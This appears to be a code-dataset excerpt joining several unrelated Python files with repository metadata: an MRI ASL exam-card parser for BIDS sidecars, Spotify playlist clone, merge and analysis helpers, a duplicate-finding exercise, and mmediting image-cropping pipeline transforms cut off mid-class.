with open(indir + '/SeriesDescription.json','r') as infile:
scannames = json.load(infile)
for scan in scannames.values():
scan_dict[scan] = {}
print('\nStarting scan:', scan)
find_scans = search_string_in_file(inputfile,scan,0)
# Find start of scan section
string_to_search = 'Protocol Name: ' + scan
if find_scans:
for line in find_scans:
for num in line:
if re.search(r"\b{}\b".format(string_to_search),str(num)):
start_line = line[0]
search_tmp = search_string_in_file(inputfile,'Arterial Spin labeling',start_line)
tmp = search_tmp[0][1].split(':')
asl_type = tmp[-1].strip()
            # set repetition time prep until a better method is found
scan_dict[scan]["RepetitionTimePreparation"] = 0
print('\tRepetition Time Preparation:',str(0), 'sec')
# If ASL type is 'NO', then scan is m0
if asl_type == 'NO':
print('\tASL type: M0 scan')
# Get file name for non-m0 scan to set as 'IntendedFor'
# Change this to look through BIDS directory
for s in scannames:
                    if 'm0' not in s and 'M0' not in s:
                        for nii_file in glob.glob(bids + '/sub-*/ses-*/perf/*.nii.gz'):
                            if 'm0' not in nii_file and 'M0' not in nii_file:
asl_nii = nii_file.split('/')
IntendedFor = '/'.join(asl_nii[-3:])
print('\tM0 intended for: ',IntendedFor)
scan_dict[scan]["IntendedFor"] = IntendedFor
# Add exam card info to m0 json
json_file = glob.glob(bids+'/sub-*/ses-*/perf/*m0scan.json')
modify_json(json_file[0],scan_dict[scan])
else:
print('\tASL type:',asl_type)
scan_dict[scan]["ArterialSpinLabelingType"] = asl_type.upper()
# Set M0 type
                if any('m0' in s or 'M0' in s for s in scannames):
M0_type = 'Separate'
else:
M0_type = 'Absent'
scan_dict[scan]["M0Type"] = M0_type
print('\tM0 type:',M0_type)
# Parse exam card for background suppression
search_tmp = search_string_in_file(inputfile,'back. supp.',start_line)
tmp = search_tmp[0][1].split(':')
back_supp = tmp[-1].strip()
if back_supp == 'NO':
back_supp = False
else:
back_supp = True
print('\tBackground Suppression:', back_supp)
scan_dict[scan]["BackgroundSuppression"] = back_supp
# Parse exam card for label delay
search_tmp = search_string_in_file(inputfile,'label delay',start_line)
tmp = search_tmp[0][1].split(':')
label_delay = int(tmp[-1].strip())/1000
print('\tLabel delay:',label_delay, 'sec')
scan_dict[scan]["PostLabelingDelay"] = label_delay
# Parse exam card for TR and nSlices to generate slice timing
search_tmp = search_string_in_file(inputfile,'Slices',start_line)
tmp = search_tmp[0][1].split(':')
n_slices = int(tmp[-1].strip())
search_tmp = search_string_in_file(inputfile,'TR ',start_line)
tmp = search_tmp[0][1].split(':')
if tmp[-1].strip() == 'USER_DEF':
search_tmp = search_string_in_file(inputfile,'(ms)',search_tmp[0][0])
tmp = search_tmp[0][1].split(':')
tr = float(tmp[-1].strip())/1000
else:
tr = float(tmp[-1].strip())/1000
# calculate slice timing
ta = tr/n_slices
slice_timing = np.linspace(0,tr-ta,n_slices) #ascending
print('\tSlice timing:',slice_timing, 'sec')
scan_dict[scan]["SliceTiming"] = slice_timing.tolist()
                if asl_type in ('pCASL', 'CASL'):
# Parse exam card for background suppression
search_tmp = search_string_in_file(inputfile,'label duration',start_line)
if not search_tmp:
search_tmp = search_string_in_file(inputfile,'EX_FLL_casl_dur',start_line)
tmp = search_tmp[0][1].split(':')
label_duration = int(tmp[-1].strip())/1000
print('\tLabeling duration:',label_duration, 'sec')
scan_dict[scan]["LabelingDuration"] = label_duration
if asl_type == 'pASL':
# Parse exam card for background suppression
#search_tmp = search_string_in_file(inputfile,'BolusCutOffFlag',start_line)
#tmp = search_tmp[0][1].split(':')
#bolus = tmp[-1].strip()
#print('\tBolus Cut Off Flag:',bolus)
scan_dict[scan]["BolusCutOffFlag"] = False
# Add exam card info to asl json
json_file = glob.glob(bids+'/sub-*/ses-*/perf/*asl.json')
modify_json(json_file[0],scan_dict[scan])
else:
print(scan,' not found. Please repeat with correct scan name.')
sys.exit()
if __name__ == '__main__':
main(sys.argv[1:])
| 31.350195
| 100
| 0.685367
|
bfc5e876d5aca8719bc659c9430188beb11437f2
| 2,842
|
py
|
Python
|
FunnelCake/SpotifyHelper.py
|
JaredDyreson/Funnel-Cake
|
8d0343c30921b4c0a865d5a5ae11a5ee1f1e8b28
|
[
"MIT"
] | 1
|
2021-06-11T01:28:44.000Z
|
2021-06-11T01:28:44.000Z
|
FunnelCake/SpotifyHelper.py
|
JaredDyreson/Funnel-Cake
|
8d0343c30921b4c0a865d5a5ae11a5ee1f1e8b28
|
[
"MIT"
] | 1
|
2022-02-18T06:57:15.000Z
|
2022-02-18T06:57:15.000Z
|
FunnelCake/SpotifyHelper.py
|
JaredDyreson/Funnel-Cake
|
8d0343c30921b4c0a865d5a5ae11a5ee1f1e8b28
|
[
"MIT"
] | null | null | null |
"""
A collection of helper scripts that directly manipulate Spotify playlists.
"""
from FunnelCake import SpotifyPlaylist
from FunnelCake import PlaylistManager
from pprint import pprint
import re
def clone(manager: PlaylistManager, src: str, force_override=False, custom_name=None):
if (not isinstance(manager, PlaylistManager.PlaylistManager) or
not isinstance(src, str)):
raise ValueError
src = SpotifyPlaylist.SpotifyPlaylist.from_url(manager, src)
destination_url = manager.create(f"{src.name} | CLONED" if not custom_name else custom_name)
if(isinstance(destination_url, bool)
or force_override):
print(f'[ERROR] Cannot clone {src.name}, it already exists (no override specified)')
return
cloned_playlist = SpotifyPlaylist.SpotifyPlaylist.from_url(manager, destination_url)
cloned_playlist.append(src.tracks)
print(f"[+] Successfully cloned {src.name}")
def merge(container: list, manager: PlaylistManager, output_name: str):
if not(isinstance(container, list)
and isinstance(manager, PlaylistManager.PlaylistManager)
and isinstance(output_name, str)):
raise ValueError
print(f'[INFO] Merging {len(container)} playlists together')
if not(output_name):
print('[ERROR] You have not supplied an output name')
return
master_, names, collaborators = None, [], set()
for element in container:
element = SpotifyPlaylist.SpotifyPlaylist.from_url(manager, element)
names.append(element.name)
collaborators.add(element.playlist_owner_display_name())
master_ = master_ + element if master_ else element
names, collabs = ', '.join(names), ', '.join(collaborators)
destination_url = manager.create(output_name, True, f'Playlist from {len(container)} playlists: {names}. Collaborators(s): {collabs}')
new_playlist = SpotifyPlaylist.SpotifyPlaylist.from_url(manager, destination_url)
if(isinstance(destination_url, bool)):
print(f'[ERROR] Could not store contents of {len(container)} playlists @ "{output_name}"; already exists')
return
else:
new_playlist.append(master_)
print(f'[SUCCESS] Created {output_name} from {names}')
def analyze(playlist: SpotifyPlaylist, manager: PlaylistManager) -> dict:
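    """Count how many of the playlist's tracks each artist is credited on.
    Returns a dict {artist_name: count} sorted by ascending count.
    """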
artists = {}
content = [subelement for element in playlist.get_detailed_track_info() for subelement in element]
for track in content:
collaborators = track["artists"]
for element in collaborators:
artist = element["name"]
if(artist not in artists.keys()):
artists[artist] = 1
else:
artists[artist]+=1
return {k: v for k, v in sorted(artists.items(), key=lambda item: item[1])}
| 39.472222
| 138
| 0.695285
|
bdb55d9dd66ff4acee9db7ce122e9e127833f376
| 772
|
py
|
Python
|
problem5.py
|
mpUrban/python_problems
|
d8c67a33119dce3a558bb1e76b9d3595932ddfa8
|
[
"MIT"
] | null | null | null |
problem5.py
|
mpUrban/python_problems
|
d8c67a33119dce3a558bb1e76b9d3595932ddfa8
|
[
"MIT"
] | null | null | null |
problem5.py
|
mpUrban/python_problems
|
d8c67a33119dce3a558bb1e76b9d3595932ddfa8
|
[
"MIT"
] | null | null | null |
# written in VS Code with jupyter extension
#https://simpleprogrammer.com/programming-interview-questions/
# How do you find duplicate numbers in an array if it contains multiple duplicates?
#%%
testArray = [2,1,5,8,4,5,4,7,3,9,4,6,1]
print('Given array: ' + str(testArray))
#%%
newArray = []
dupeArray = []
for element in testArray:
if element not in newArray:
newArray.append(element)
else:
dupeArray.append(element)
#%%
print('The array with duplicates removed is: ')
print(newArray)
print('The duplicates found are: ')
print(dupeArray)
#%%
tempArray = {}
for i in testArray:
# get(key, default) falls back to default if key is not present
tempArray[i] = tempArray.get(i, 0) + 1
tempArray
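#%%
# Editor's addition (illustrative): the count dict above can be reduced to just the
# values that occur more than once, answering the original question directly.
dupesFromCounts = [value for value, count in tempArray.items() if count > 1]
print('Duplicates found via counting: ' + str(dupesFromCounts))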
| 24.125
| 83
| 0.694301
|
aedd70eb81f88f6c8d90ce17075cec2c30a85149
| 615
|
py
|
Python
|
0088_Merge_Sorted_Array.py
|
21PIRLO21/LeetCode2020
|
ccf318749067214ff3cdf9964a81d6b8422f986e
|
[
"MIT"
] | null | null | null |
0088_Merge_Sorted_Array.py
|
21PIRLO21/LeetCode2020
|
ccf318749067214ff3cdf9964a81d6b8422f986e
|
[
"MIT"
] | null | null | null |
0088_Merge_Sorted_Array.py
|
21PIRLO21/LeetCode2020
|
ccf318749067214ff3cdf9964a81d6b8422f986e
|
[
"MIT"
] | null | null | null |
from typing import List
class Solution:
def merge(self, nums1: List[int], m: int, nums2: List[int], n: int) -> None:
"""
Do not return anything, modify nums1 in-place instead.
"""
        # two pointers, scanning both arrays from the back
index1, index2 = m - 1, n - 1
end = m + n - 1
while index1 >= 0 and index2 >= 0:
if nums1[index1] >= nums2[index2]:
nums1[end] = nums1[index1]
index1 -= 1
else:
nums1[end] = nums2[index2]
index2 -= 1
end -= 1
nums1[:index2+1] = nums2[:index2+1]
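# Editor's sketch (not part of the original solution): a quick sanity check of the
# in-place merge.
if __name__ == "__main__":
    nums1, nums2 = [1, 2, 3, 0, 0, 0], [2, 5, 6]
    Solution().merge(nums1, 3, nums2, 3)
    print(nums1)  # expected: [1, 2, 2, 3, 5, 6]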
| 27.954545
| 81
| 0.445528
|
6d465fb0b2dd635abace840c0b0720296abc6426
| 1,263
|
py
|
Python
|
Python version/languages/asp/answer_set.py
|
DomenicoIngrati/EmbASP
|
05000e0e65e7c84609f45e76dd32f7abaa0c5fbe
|
[
"MIT"
] | null | null | null |
Python version/languages/asp/answer_set.py
|
DomenicoIngrati/EmbASP
|
05000e0e65e7c84609f45e76dd32f7abaa0c5fbe
|
[
"MIT"
] | null | null | null |
Python version/languages/asp/answer_set.py
|
DomenicoIngrati/EmbASP
|
05000e0e65e7c84609f45e76dd32f7abaa0c5fbe
|
[
"MIT"
] | null | null | null |
from languages.asp.asp_mapper import ASPMapper
class AnswerSet(object):
"""A collection of data representing a generic Answer Set."""
def __init__(self, value, weight_map=None):
if weight_map is None:
weight_map = dict()
self.__value = value # Where data of answer set is stored
self.__weight_map = weight_map # Where weights of the answer set are stored
self.__atoms = set() # Where answer set's atoms are stored
def get_answer_set(self):
"""Return the current __value data.
        The method returns the answer set as a list of atoms in string format.
"""
return self.__value
def get_atoms(self):
"""Return atoms stored in __atoms.
        The method returns a set of objects obtained by mapping the atoms through ASPMapper.
"""
if not self.__atoms:
mapper = ASPMapper.get_instance()
for atom in self.__value:
obj = mapper.get_object(atom)
if obj is not None:
self.__atoms.add(obj)
return self.__atoms
def get_weights(self):
"""Return the weight_map."""
return self.__weight_map
def __str__(self):
"""Overload string method."""
return str(self.__value)
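# Editor's sketch (illustrative, not part of the original module): building an
# answer set from plain atom strings; get_atoms() additionally needs classes
# registered with ASPMapper, so only the raw value and weights are shown here.
if __name__ == "__main__":
    answer_set = AnswerSet(["node(1)", "node(2)", "edge(1,2)"])
    print(answer_set)                # the raw atom list
    print(answer_set.get_weights())  # {} when no weights were provided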
| 30.071429
| 84
| 0.608076
|
ee0a01b95bd37d1e0a51b0694b2d564962edf877
| 295
|
py
|
Python
|
travello/models.py
|
Prantikc22/Travel-App-Django
|
2542590ea7c22da671abd561b5b06215bb3fd37c
|
[
"MIT"
] | null | null | null |
travello/models.py
|
Prantikc22/Travel-App-Django
|
2542590ea7c22da671abd561b5b06215bb3fd37c
|
[
"MIT"
] | 6
|
2021-03-19T02:45:08.000Z
|
2021-09-08T01:57:23.000Z
|
travello/models.py
|
Prantikc22/Travel-App-Django
|
2542590ea7c22da671abd561b5b06215bb3fd37c
|
[
"MIT"
] | null | null | null |
from django.db import models
# Create your models here.
class Destination(models.Model):
name = models.CharField(max_length=100)
img = models.ImageField(upload_to='pics')
dsc = models.TextField()
price = models.IntegerField()
offer = models.BooleanField(default=False)
| 26.818182
| 46
| 0.715254
|
51fa24253cdcec1fdd214ee2e7fcf7018e5676c1
| 28,289
|
py
|
Python
|
mmedit/datasets/pipelines/crop.py
|
akimotty877/mmediting
|
cae872d6f3e867ba144c7c0dbc29a0ee1a29e5a6
|
[
"Apache-2.0"
] | null | null | null |
mmedit/datasets/pipelines/crop.py
|
akimotty877/mmediting
|
cae872d6f3e867ba144c7c0dbc29a0ee1a29e5a6
|
[
"Apache-2.0"
] | null | null | null |
mmedit/datasets/pipelines/crop.py
|
akimotty877/mmediting
|
cae872d6f3e867ba144c7c0dbc29a0ee1a29e5a6
|
[
"Apache-2.0"
] | null | null | null |
# Copyright (c) OpenMMLab. All rights reserved.
import math
import random
import mmcv
import numpy as np
from torch.nn.modules.utils import _pair
from ..registry import PIPELINES
from .utils import random_choose_unknown
@PIPELINES.register_module()
class Crop:
"""Crop data to specific size for training.
Args:
keys (Sequence[str]): The images to be cropped.
crop_size (Tuple[int]): Target spatial size (h, w).
random_crop (bool): If set to True, it will random crop
image. Otherwise, it will work as center crop.
is_pad_zeros (bool, optional): Whether to pad the image with 0 if
crop_size is greater than image size. Default: False.
"""
def __init__(self, keys, crop_size, random_crop=True, is_pad_zeros=False):
if not mmcv.is_tuple_of(crop_size, int):
raise TypeError(
'Elements of crop_size must be int and crop_size must be'
f' tuple, but got {type(crop_size[0])} in {type(crop_size)}')
self.keys = keys
self.crop_size = crop_size
self.random_crop = random_crop
self.is_pad_zeros = is_pad_zeros
def _crop(self, data):
if not isinstance(data, list):
data_list = [data]
else:
data_list = data
crop_bbox_list = []
data_list_ = []
for item in data_list:
data_h, data_w = item.shape[:2]
crop_h, crop_w = self.crop_size
if self.is_pad_zeros:
crop_y_offset, crop_x_offset = 0, 0
if crop_h > data_h:
crop_y_offset = (crop_h - data_h) // 2
if crop_w > data_w:
crop_x_offset = (crop_w - data_w) // 2
if crop_y_offset > 0 or crop_x_offset > 0:
pad_width = [(2 * crop_y_offset, 2 * crop_y_offset),
(2 * crop_x_offset, 2 * crop_x_offset)]
if item.ndim == 3:
pad_width.append((0, 0))
item = np.pad(
item,
tuple(pad_width),
mode='constant',
constant_values=0)
data_h, data_w = item.shape[:2]
crop_h = min(data_h, crop_h)
crop_w = min(data_w, crop_w)
if self.random_crop:
x_offset = np.random.randint(0, data_w - crop_w + 1)
y_offset = np.random.randint(0, data_h - crop_h + 1)
else:
x_offset = max(0, (data_w - crop_w)) // 2
y_offset = max(0, (data_h - crop_h)) // 2
crop_bbox = [x_offset, y_offset, crop_w, crop_h]
item_ = item[y_offset:y_offset + crop_h,
x_offset:x_offset + crop_w, ...]
crop_bbox_list.append(crop_bbox)
data_list_.append(item_)
if not isinstance(data, list):
return data_list_[0], crop_bbox_list[0]
return data_list_, crop_bbox_list
def __call__(self, results):
"""Call function.
Args:
results (dict): A dict containing the necessary information and
data for augmentation.
Returns:
dict: A dict containing the processed data and information.
"""
for k in self.keys:
data_, crop_bbox = self._crop(results[k])
results[k] = data_
results[k + '_crop_bbox'] = crop_bbox
results['crop_size'] = self.crop_size
return results
def __repr__(self):
repr_str = self.__class__.__name__
repr_str += (f'keys={self.keys}, crop_size={self.crop_size}, '
f'random_crop={self.random_crop}')
return repr_str
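# Editor's note (illustrative): in a dataset pipeline config this transform is
# typically declared as a dict entry, e.g.
#     dict(type='Crop', keys=['gt'], crop_size=(256, 256), random_crop=True)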
@PIPELINES.register_module()
class RandomResizedCrop(object):
"""Crop data to random size and aspect ratio.
A crop of a random proportion of the original image
and a random aspect ratio of the original aspect ratio is made.
The cropped image is finally resized to a given size specified
by 'crop_size'. Modified keys are the attributes specified in "keys".
This code is partially adopted from
torchvision.transforms.RandomResizedCrop:
[https://pytorch.org/vision/stable/_modules/torchvision/transforms/\
transforms.html#RandomResizedCrop].
Args:
keys (list[str]): The images to be resized and random-cropped.
crop_size (int | tuple[int]): Target spatial size (h, w).
scale (tuple[float], optional): Range of the proportion of the original
image to be cropped. Default: (0.08, 1.0).
ratio (tuple[float], optional): Range of aspect ratio of the crop.
Default: (3. / 4., 4. / 3.).
interpolation (str, optional): Algorithm used for interpolation.
It can be only either one of the following:
"nearest" | "bilinear" | "bicubic" | "area" | "lanczos".
Default: "bilinear".
"""
def __init__(self,
keys,
crop_size,
scale=(0.08, 1.0),
ratio=(3. / 4., 4. / 3.),
interpolation='bilinear'):
assert keys, 'Keys should not be empty.'
if isinstance(crop_size, int):
crop_size = (crop_size, crop_size)
elif not mmcv.is_tuple_of(crop_size, int):
raise TypeError('"crop_size" must be an integer '
'or a tuple of integers, but got '
f'{type(crop_size)}')
if not mmcv.is_tuple_of(scale, float):
raise TypeError('"scale" must be a tuple of float, '
f'but got {type(scale)}')
if not mmcv.is_tuple_of(ratio, float):
raise TypeError('"ratio" must be a tuple of float, '
f'but got {type(ratio)}')
self.keys = keys
self.crop_size = crop_size
self.scale = scale
self.ratio = ratio
self.interpolation = interpolation
def get_params(self, data):
"""Get parameters for a random sized crop.
Args:
data (np.ndarray): Image of type numpy array to be cropped.
Returns:
A tuple containing the coordinates of the top left corner
and the chosen crop size.
"""
data_h, data_w = data.shape[:2]
area = data_h * data_w
for _ in range(10):
target_area = random.uniform(*self.scale) * area
log_ratio = (math.log(self.ratio[0]), math.log(self.ratio[1]))
aspect_ratio = math.exp(random.uniform(*log_ratio))
crop_w = int(round(math.sqrt(target_area * aspect_ratio)))
crop_h = int(round(math.sqrt(target_area / aspect_ratio)))
if 0 < crop_w <= data_w and 0 < crop_h <= data_h:
top = random.randint(0, data_h - crop_h)
left = random.randint(0, data_w - crop_w)
return top, left, crop_h, crop_w
# Fall back to center crop
in_ratio = float(data_w) / float(data_h)
if (in_ratio < min(self.ratio)):
crop_w = data_w
crop_h = int(round(crop_w / min(self.ratio)))
elif (in_ratio > max(self.ratio)):
crop_h = data_h
crop_w = int(round(crop_h * max(self.ratio)))
else: # whole image
crop_w = data_w
crop_h = data_h
top = (data_h - crop_h) // 2
left = (data_w - crop_w) // 2
return top, left, crop_h, crop_w
def __call__(self, results):
"""Call function.
Args:
results (dict): A dict containing the necessary information and
data for augmentation.
Returns:
dict: A dict containing the processed data and information.
"""
for k in self.keys:
top, left, crop_h, crop_w = self.get_params(results[k])
crop_bbox = [top, left, crop_w, crop_h]
results[k] = results[k][top:top + crop_h, left:left + crop_w, ...]
results[k] = mmcv.imresize(
results[k],
self.crop_size,
return_scale=False,
interpolation=self.interpolation)
results[k + '_crop_bbox'] = crop_bbox
return results
def __repr__(self):
repr_str = self.__class__.__name__
repr_str += (f'(keys={self.keys}, crop_size={self.crop_size}, '
f'scale={self.scale}, ratio={self.ratio}, '
f'interpolation={self.interpolation})')
return repr_str
@PIPELINES.register_module()
class FixedCrop:
"""Crop paired data (at a specific position) to specific size for training.
Args:
keys (Sequence[str]): The images to be cropped.
crop_size (Tuple[int]): Target spatial size (h, w).
crop_pos (Tuple[int]): Specific position (x, y). If set to None,
random initialize the position to crop paired data batch.
"""
def __init__(self, keys, crop_size, crop_pos=None):
if not mmcv.is_tuple_of(crop_size, int):
raise TypeError(
'Elements of crop_size must be int and crop_size must be'
f' tuple, but got {type(crop_size[0])} in {type(crop_size)}')
if not mmcv.is_tuple_of(crop_pos, int) and (crop_pos is not None):
raise TypeError(
'Elements of crop_pos must be int and crop_pos must be'
f' tuple or None, but got {type(crop_pos[0])} in '
f'{type(crop_pos)}')
self.keys = keys
self.crop_size = crop_size
self.crop_pos = crop_pos
def _crop(self, data, x_offset, y_offset, crop_w, crop_h):
crop_bbox = [x_offset, y_offset, crop_w, crop_h]
data_ = data[y_offset:y_offset + crop_h, x_offset:x_offset + crop_w,
...]
return data_, crop_bbox
def __call__(self, results):
"""Call function.
Args:
results (dict): A dict containing the necessary information and
data for augmentation.
Returns:
dict: A dict containing the processed data and information.
"""
if isinstance(results[self.keys[0]], list):
data_h, data_w = results[self.keys[0]][0].shape[:2]
else:
data_h, data_w = results[self.keys[0]].shape[:2]
crop_h, crop_w = self.crop_size
crop_h = min(data_h, crop_h)
crop_w = min(data_w, crop_w)
if self.crop_pos is None:
x_offset = np.random.randint(0, data_w - crop_w + 1)
y_offset = np.random.randint(0, data_h - crop_h + 1)
else:
x_offset, y_offset = self.crop_pos
crop_w = min(data_w - x_offset, crop_w)
crop_h = min(data_h - y_offset, crop_h)
for k in self.keys:
images = results[k]
is_list = isinstance(images, list)
if not is_list:
images = [images]
cropped_images = []
crop_bbox = None
for image in images:
# In fixed crop for paired images, sizes should be the same
if (image.shape[0] != data_h or image.shape[1] != data_w):
raise ValueError(
'The sizes of paired images should be the same. '
f'Expected ({data_h}, {data_w}), '
f'but got ({image.shape[0]}, '
f'{image.shape[1]}).')
data_, crop_bbox = self._crop(image, x_offset, y_offset,
crop_w, crop_h)
cropped_images.append(data_)
results[k + '_crop_bbox'] = crop_bbox
if not is_list:
cropped_images = cropped_images[0]
results[k] = cropped_images
results['crop_size'] = self.crop_size
results['crop_pos'] = self.crop_pos
return results
def __repr__(self):
repr_str = self.__class__.__name__
repr_str += (f'keys={self.keys}, crop_size={self.crop_size}, '
f'crop_pos={self.crop_pos}')
return repr_str
@PIPELINES.register_module()
class PairedRandomCrop:
"""Paried random crop.
It crops a pair of lq and gt images with corresponding locations.
It also supports accepting lq list and gt list.
Required keys are "scale", "lq", and "gt",
added or modified keys are "lq" and "gt".
Args:
gt_patch_size (int): cropped gt patch size.
"""
def __init__(self, gt_patch_size):
self.gt_patch_size = gt_patch_size
def __call__(self, results):
"""Call function.
Args:
results (dict): A dict containing the necessary information and
data for augmentation.
Returns:
dict: A dict containing the processed data and information.
"""
scale = results['scale']
lq_patch_size = self.gt_patch_size // scale
lq_is_list = isinstance(results['lq'], list)
if not lq_is_list:
results['lq'] = [results['lq']]
gt_is_list = isinstance(results['gt'], list)
if not gt_is_list:
results['gt'] = [results['gt']]
h_lq, w_lq, _ = results['lq'][0].shape
h_gt, w_gt, _ = results['gt'][0].shape
if h_gt != h_lq * scale or w_gt != w_lq * scale:
raise ValueError(
f'Scale mismatches. GT ({h_gt}, {w_gt}) is not {scale}x '
f'multiplication of LQ ({h_lq}, {w_lq}).')
if h_lq < lq_patch_size or w_lq < lq_patch_size:
raise ValueError(
f'LQ ({h_lq}, {w_lq}) is smaller than patch size '
f'({lq_patch_size}, {lq_patch_size}). Please check '
f'{results["lq_path"][0]} and {results["gt_path"][0]}.')
# randomly choose top and left coordinates for lq patch
top = np.random.randint(h_lq - lq_patch_size + 1)
left = np.random.randint(w_lq - lq_patch_size + 1)
# crop lq patch
results['lq'] = [
v[top:top + lq_patch_size, left:left + lq_patch_size, ...]
for v in results['lq']
]
# crop corresponding gt patch
top_gt, left_gt = int(top * scale), int(left * scale)
results['gt'] = [
v[top_gt:top_gt + self.gt_patch_size,
left_gt:left_gt + self.gt_patch_size, ...] for v in results['gt']
]
if not lq_is_list:
results['lq'] = results['lq'][0]
if not gt_is_list:
results['gt'] = results['gt'][0]
return results
def __repr__(self):
repr_str = self.__class__.__name__
repr_str += f'(gt_patch_size={self.gt_patch_size})'
return repr_str
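# Editor's note (illustrative): with results['scale'] == 4 and
#     dict(type='PairedRandomCrop', gt_patch_size=128)
# the lq crop is 32x32 and the gt crop is the matching 128x128 region.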
@PIPELINES.register_module()
class CropAroundCenter:
"""Randomly crop the images around unknown area in the center 1/4 images.
This cropping strategy is adopted in GCA matting. The `unknown area` is the
same as `semi-transparent area`.
https://arxiv.org/pdf/2001.04069.pdf
It retains the center 1/4 images and resizes the images to 'crop_size'.
Required keys are "fg", "bg", "trimap" and "alpha", added or modified keys
are "crop_bbox", "fg", "bg", "trimap" and "alpha".
Args:
crop_size (int | tuple): Desired output size. If int, square crop is
applied.
"""
def __init__(self, crop_size):
if mmcv.is_tuple_of(crop_size, int):
assert len(crop_size) == 2, 'length of crop_size must be 2.'
elif not isinstance(crop_size, int):
raise TypeError('crop_size must be int or a tuple of int, but got '
f'{type(crop_size)}')
self.crop_size = _pair(crop_size)
def __call__(self, results):
"""Call function.
Args:
results (dict): A dict containing the necessary information and
data for augmentation.
Returns:
dict: A dict containing the processed data and information.
"""
fg = results['fg']
alpha = results['alpha']
trimap = results['trimap']
bg = results['bg']
h, w = fg.shape[:2]
assert bg.shape == fg.shape, (f'shape of bg {bg.shape} should be the '
f'same as fg {fg.shape}.')
crop_h, crop_w = self.crop_size
# Make sure h >= crop_h, w >= crop_w. If not, rescale imgs
rescale_ratio = max(crop_h / h, crop_w / w)
if rescale_ratio > 1:
new_h = max(int(h * rescale_ratio), crop_h)
new_w = max(int(w * rescale_ratio), crop_w)
fg = mmcv.imresize(fg, (new_w, new_h), interpolation='nearest')
alpha = mmcv.imresize(
alpha, (new_w, new_h), interpolation='nearest')
trimap = mmcv.imresize(
trimap, (new_w, new_h), interpolation='nearest')
bg = mmcv.imresize(bg, (new_w, new_h), interpolation='bicubic')
h, w = new_h, new_w
# resize to 1/4 to ignore small unknown patches
small_trimap = mmcv.imresize(
trimap, (w // 4, h // 4), interpolation='nearest')
# find unknown area in center 1/4 region
margin_h, margin_w = crop_h // 2, crop_w // 2
sample_area = small_trimap[margin_h // 4:(h - margin_h) // 4,
margin_w // 4:(w - margin_w) // 4]
unknown_xs, unknown_ys = np.where(sample_area == 128)
unknown_num = len(unknown_xs)
if unknown_num < 10:
# too few unknown area in the center, crop from the whole image
top = np.random.randint(0, h - crop_h + 1)
left = np.random.randint(0, w - crop_w + 1)
else:
idx = np.random.randint(unknown_num)
top = unknown_xs[idx] * 4
left = unknown_ys[idx] * 4
bottom = top + crop_h
right = left + crop_w
results['fg'] = fg[top:bottom, left:right]
results['alpha'] = alpha[top:bottom, left:right]
results['trimap'] = trimap[top:bottom, left:right]
results['bg'] = bg[top:bottom, left:right]
results['crop_bbox'] = (left, top, right, bottom)
return results
def __repr__(self):
return self.__class__.__name__ + f'(crop_size={self.crop_size})'
@PIPELINES.register_module()
class CropAroundUnknown:
"""Crop around unknown area with a randomly selected scale.
Randomly select the w and h from a list of (w, h).
Required keys are the keys in argument `keys`, added or
modified keys are "crop_bbox" and the keys in argument `keys`.
This class assumes value of "alpha" ranges from 0 to 255.
Args:
keys (Sequence[str]): The images to be cropped. It must contain
'alpha'. If unknown_source is set to 'trimap', then it must also
contain 'trimap'.
crop_sizes (list[int | tuple[int]]): List of (w, h) to be selected.
unknown_source (str, optional): Unknown area to select from. It must be
            'alpha' or 'trimap'. Default to 'alpha'.
interpolations (str | list[str], optional): Interpolation method of
mmcv.imresize. The interpolation operation will be applied when
image size is smaller than the crop_size. If given as a list of
str, it should have the same length as `keys`. Or if given as a
str all the keys will be resized with the same method.
Default to 'bilinear'.
"""
def __init__(self,
keys,
crop_sizes,
unknown_source='alpha',
interpolations='bilinear'):
if 'alpha' not in keys:
raise ValueError(f'"alpha" must be in keys, but got {keys}')
self.keys = keys
if not isinstance(crop_sizes, list):
raise TypeError(
f'Crop sizes must be list, but got {type(crop_sizes)}.')
self.crop_sizes = [_pair(crop_size) for crop_size in crop_sizes]
if not mmcv.is_tuple_of(self.crop_sizes[0], int):
raise TypeError('Elements of crop_sizes must be int or tuple of '
f'int, but got {type(self.crop_sizes[0][0])}.')
if unknown_source not in ['alpha', 'trimap']:
raise ValueError('unknown_source must be "alpha" or "trimap", '
f'but got {unknown_source}')
if unknown_source not in keys:
# it could only be trimap, since alpha is checked before
raise ValueError(
'if unknown_source is "trimap", it must also be set in keys')
self.unknown_source = unknown_source
if isinstance(interpolations, str):
self.interpolations = [interpolations] * len(self.keys)
elif mmcv.is_list_of(interpolations,
str) and len(interpolations) == len(self.keys):
self.interpolations = interpolations
else:
raise TypeError(
'interpolations must be a str or list of str with '
f'the same length as keys, but got {interpolations}')
def __call__(self, results):
"""Call function.
Args:
results (dict): A dict containing the necessary information and
data for augmentation.
Returns:
dict: A dict containing the processed data and information.
"""
h, w = results[self.keys[0]].shape[:2]
rand_ind = np.random.randint(len(self.crop_sizes))
crop_h, crop_w = self.crop_sizes[rand_ind]
# Make sure h >= crop_h, w >= crop_w. If not, rescale imgs
rescale_ratio = max(crop_h / h, crop_w / w)
if rescale_ratio > 1:
h = max(int(h * rescale_ratio), crop_h)
w = max(int(w * rescale_ratio), crop_w)
for key, interpolation in zip(self.keys, self.interpolations):
results[key] = mmcv.imresize(
results[key], (w, h), interpolation=interpolation)
# Select the cropping top-left point which is an unknown pixel
if self.unknown_source == 'alpha':
unknown = (results['alpha'] > 0) & (results['alpha'] < 255)
else:
unknown = results['trimap'] == 128
top, left = random_choose_unknown(unknown.squeeze(), (crop_h, crop_w))
bottom = top + crop_h
right = left + crop_w
for key in self.keys:
results[key] = results[key][top:bottom, left:right]
results['crop_bbox'] = (left, top, right, bottom)
return results
def __repr__(self):
repr_str = self.__class__.__name__
repr_str += (f'(keys={self.keys}, crop_sizes={self.crop_sizes}, '
f"unknown_source='{self.unknown_source}', "
f'interpolations={self.interpolations})')
return repr_str
@PIPELINES.register_module()
class CropAroundFg:
"""Crop around the whole foreground in the segmentation mask.
Required keys are "seg" and the keys in argument `keys`.
Meanwhile, "seg" must be in argument `keys`. Added or modified keys are
"crop_bbox" and the keys in argument `keys`.
Args:
keys (Sequence[str]): The images to be cropped. It must contain
'seg'.
bd_ratio_range (tuple, optional): The range of the boundary (bd) ratio
to select from. The boundary ratio is the ratio of the boundary to
the minimal bbox that contains the whole foreground given by
segmentation. Default to (0.1, 0.4).
test_mode (bool): Whether use test mode. In test mode, the tight crop
            area of foreground will be extended to a square.
Default to False.
"""
def __init__(self, keys, bd_ratio_range=(0.1, 0.4), test_mode=False):
if 'seg' not in keys:
raise ValueError(f'"seg" must be in keys, but got {keys}')
if (not mmcv.is_tuple_of(bd_ratio_range, float)
